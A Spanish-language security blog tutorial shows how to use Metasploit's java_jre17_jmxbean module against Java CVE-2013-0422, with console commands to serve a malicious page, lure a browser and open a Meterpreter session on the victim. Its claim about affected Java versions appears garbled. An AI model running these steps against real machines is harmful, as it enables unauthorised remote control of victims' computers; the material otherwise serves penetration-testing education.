Metasploit | Exploits | Oracle Java CVE-2013-0422

[Read this post in English]

 

En este post mostraremos cómo utilizar el Framework de Metasploit para explotar la vulnerabilidad de Java CVE-2013-0422 a la que son vulnerables las versiones abajo de Java 11.

Los pasos se muestran a continuación:

  • Iniciar el Framework de Metasploit con el comando msfconsole.
  • Configurar el exploit de Java u10 JMXBEAN con los siguientes comandos:

 

msf > use exploit/multi/browser/java_jre17_jmxbean

msf    exploit (java_jre17_jmxbean) > set SRVHOST [IP_local_de_Metasploit]

 

  • Ejecutar el exploit con el siguiente comando:

 

msf   exploit (java_jre17_jmxbean) > exploit

 

  • Ejecutado el exploit, buscar la siguiente línea y copiarla

 

[*] Using URL: http://[IP_de_Metasploit]:8080/ksdiksld

 

  • En la máquina atacada, pegar la URL en Internet Explorer. Aparecerá una página en blanco con la leyenda “Loading, Please Wait…”.
  • En la sesión de Putty se verán los pasos en los que se ejecuta el exploit. Buscar una línea similar a la siguiente para obtener el número de sesión que se encuentra abierta para tomar control de la máquina Cliente:

 

[*] Meterpreter session 1 opened ([IP_Local_Metasploit]:4444 -> [IP_Victima]:1506) at …

 

  • Ya que se cuenta con el número de sesión hay que abrirla con el siguiente comando (es posible que haya que teclear un “ENTER” para obtener el prompt nuevamente):

 

msf   exploit (java_jre17_jmxbean) > sessions –i 1

donde 1 es el número de sesión obtenido previamente.

 

  • Se obtendrá el promtp de meterpreter, aquí podemos ejecutar el comando sysinfo para validar que se tiene control sobre la máquina cliente.
  • Para cerrar la sesión y el exploit ejecutamos los siguientes comandos:

 

meterpreter > exit

msf    exploit (java_jre17_jmxbean) > jobs

como salida de este comando obtendremos el ID del exploit en ejecución, para detenerlo ejecutamos el siguiente comando:

msf    exploit (java_jre17_jmxbean) > kill 0

donde “0” es el ID del exploit obtenido en el paso anterior.

 

Busca en nuestros tags sobre Exploits y Metasploit para obtener mayor información.

 

Recuerda que puedes mandarnos tus preguntas y comentarios a nuestra cuenta de Twitter: @redinskala donde encontrarás más información y tips de seguridad.

 

One thought on “Metasploit | Exploits | Oracle Java CVE-2013-0422

  1. Pingback: Metasploit | Exploits | Oracle Java-2013-0422 | RedinSkala

Comments are closed.